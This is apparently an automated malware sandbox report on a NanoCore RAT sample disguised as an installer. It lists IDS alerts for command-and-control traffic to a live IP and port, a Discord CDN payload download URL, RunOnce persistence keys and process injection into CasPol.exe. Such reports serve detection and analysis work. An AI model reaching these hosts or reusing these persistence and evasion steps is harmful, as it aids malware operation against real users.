      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49858 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49858 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49859 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49859 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.11.20:49859 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49860 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49860 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49861 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49861 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49862 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49862 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49863 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49863 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49864 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49864 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49865 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49865 -> 23.105.131.228:5218
      Source: Malware configuration extractorURLs: https://cdn.discordapp.com/attachments/963535165500588126/979423160845869128/nanoexp_bWgaxBaEn43.bin
      Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-NYC-11US LEASEWEB-USA-NYC-11US
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Joe Sandbox ViewIP Address: 23.105.131.228 23.105.131.228
      Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
      Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
      Source: global trafficHTTP traffic detected: GET /attachments/963535165500588126/979423160845869128/nanoexp_bWgaxBaEn43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
      Source: global trafficTCP traffic: 192.168.11.20:49768 -> 23.105.131.228:5218
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Militrpoliti2.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Militrpoliti2.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: Lib.Platform.Windows.Native.dll.2.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
      Source: CasPol.exe, 00000004.00000003.213808760129.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.214076230540.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.214141314816.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: CasPol.exe, 00000004.00000003.213808760129.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.214076230540.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.214141314816.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: Lib.Platform.Windows.Native.dll.2.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
      Source: Lib.Platform.Windows.Native.dll.2.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
      Source: NMDllHost.exe.2.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Militrpoliti2.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Militrpoliti2.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: Lib.Platform.Windows.Native.dll.2.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
      Source: Lib.Platform.Windows.Native.dll.2.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Militrpoliti2.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Lib.Platform.Windows.Native.dll.2.drString found in binary or memory: http://ocsp.comodoca.com0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Militrpoliti2.exe.4.drString found in binary or memory: http://ocsp.digicert.com0A
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Militrpoliti2.exe.4.drString found in binary or memory: http://ocsp.digicert.com0X
      Source: Lib.Platform.Windows.Native.dll.2.drString found in binary or memory: http://ocsp.sectigo.com0
      Source: NMDllHost.exe.2.drString found in binary or memory: http://ocsp.thawte.com0
      Source: NMDllHost.exe.2.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
      Source: NMDllHost.exe.2.drString found in binary or memory: http://s2.symcb.com0
      Source: SourceCodePro-Medium.otf.2.drString found in binary or memory: http://scripts.sil.org/OFLSource
      Source: NMDllHost.exe.2.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
      Source: NMDllHost.exe.2.drString found in binary or memory: http://sv.symcb.com/sv.crt0
      Source: NMDllHost.exe.2.drString found in binary or memory: http://sv.symcd.com0&
      Source: NMDllHost.exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
      Source: NMDllHost.exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
      Source: NMDllHost.exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
      Source: NMDllHost.exe.2.drString found in binary or memory: http://www.nero.com
      Source: NMDllHost.exe.2.drString found in binary or memory: http://www.symauth.com/cps0(
      Source: NMDllHost.exe.2.drString found in binary or memory: http://www.symauth.com/rpa00
      Source: CasPol.exe, 00000004.00000003.214075868688.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.214140695527.00000000007AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
      Source: CasPol.exe, 00000004.00000003.214140465902.0000000000792000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.214075728029.0000000000792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/LQ%
      Source: CasPol.exe, 00000004.00000003.214075936789.00000000007BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/963535165500588126/979423160845869128/nanoexp_bWgaxBaEn43.bin
      Source: CasPol.exe, 00000004.00000003.214140465902.0000000000792000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.214075728029.0000000000792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/dQ
      Source: Lib.Platform.Windows.Native.dll.2.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
      Source: NMDllHost.exe.2.drString found in binary or memory: https://d.symcb.com/cps0%
      Source: NMDllHost.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0
      Source: Lib.Platform.Windows.Native.dll.2.drString found in binary or memory: https://sectigo.com/CPS0
      Source: Lib.Platform.Windows.Native.dll.2.drString found in binary or memory: https://sectigo.com/CPS0D
      Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
      Source: global trafficHTTP traffic detected: GET /attachments/963535165500588126/979423160845869128/nanoexp_bWgaxBaEn43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.11.20:49767 version: TLS 1.2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_004056DE
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040352D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_0040755C2_2_0040755C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_00406D852_2_00406D85
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_6FE01BFF2_2_6FE01BFF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A43C122_2_02A43C12
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A488082_2_02A48808
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A5784A2_2_02A5784A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A495A82_2_02A495A8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A46B802_2_02A46B80
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A47DCB2_2_02A47DCB
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A47DD62_2_02A47DD6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A549452_2_02A54945
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A4CB442_2_02A4CB44
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A58AD4 NtProtectVirtualMemory,2_2_02A58AD4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A591DD NtResumeThread,2_2_02A591DD
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameathcfg10.dll vs SecuriteInfo.com.W32.AIDetect.malware2.23037.exe
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dllJump to behavior
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exeStatic PE information: invalid certificate
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exeVirustotal: Detection: 10%
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeJump to behavior
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe"
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe"
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe" Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040352D
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile created: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EBJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeFile created: C:\Users\user\AppData\Local\Temp\nsqF33A.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@4/19@78/2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_004021AA CoCreateInstance,2_2_004021AA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_0040498A
      Source: System.Net.Http.dll.2.dr, System.Net.Http/HttpContent.csTask registration methods: 'CreateContentReadStreamAsync', 'CreateCompletedTask'
      Source: System.Net.Http.dll.2.dr, System.Net.Http/ByteArrayContent.csTask registration methods: 'CreateContentReadStreamAsync'
      Source: System.Net.Http.dll.2.dr, System.Net.Http/StreamContent.csTask registration methods: 'CreateContentReadStreamAsync'
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:304:WilStaging_02
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{190cd7bb-eb81-4624-b859-1727ba707e97}
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeFile written: C:\Users\user\AppData\Local\Temp\Bolson210.iniJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IndianerhvdingJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: C:\Builds\219\N2\HO_NMDllHost_g_2016_r_0\Sources\NMDllHost_2016\src\NMDllHost\NMDllHost\x86\Release\NMDllHost.pdb source: NMDllHost.exe.2.dr
      Source: Binary string: F:\APPS8.0.0.85\sw\src\apps\acapi\acapi___Win32_Release_Unicode\athcfg20U.pdb source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmp, athcfg20U.dll.2.dr
      Source: Binary string: System.Net.Http.pdb source: System.Net.Http.dll.2.dr
      Source: Binary string: F:\APPS8.0.0.85\sw\src\apps\acapi\acapi___Win32_Release_Unicode\athcfg20U.pdbeSuppTypeVendorACAPI.initGlobalResources failed: %s source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmp
      Source: Binary string: d:\Projects\AirVPN\Repo\eddie-air\src\Lib.Platform.Windows.Native\bin\x64\Release\Lib.Platform.Windows.Native.pdb source: Lib.Platform.Windows.Native.dll.2.dr

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000004.00000000.213653060266.0000000000630000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_6FE030C0 push eax; ret 2_2_6FE030EE
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A43C12 push C26212D5h; retn 3481h2_2_02A43CF6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A420A6 pushad ; retf 2_2_02A420E4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A43603 push 00000042h; retf 2_2_02A43610
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A4386C push ecx; retn 3C43h2_2_02A439E1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A43640 push 00000042h; retf 2_2_02A43610
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A435BC push 00000042h; retf 2_2_02A43610
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A47DBD push edi; ret 2_2_02A47DBF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A42DE2 pushfd ; retf 2_2_02A53CC4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_02A471C3 pushfd ; retf 2_2_02A53CC4
      Source: NMDllHost.exe.2.drStatic PE information: section name: .shared
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_6FE01BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_6FE01BFF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeFile created: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeFile created: C:\Users\user\AppData\Local\Temp\NMDllHost.exeJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeFile created: C:\Users\user\AppData\Local\Temp\athcfg20U.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeFile created: C:\Users\user\AppData\Local\Temp\Lib.Platform.Windows.Native.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeFile created: C:\Users\user\AppData\Local\Temp\System.Net.Http.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce FatigableJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce FatigableJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce FatigableJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce FatigableJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
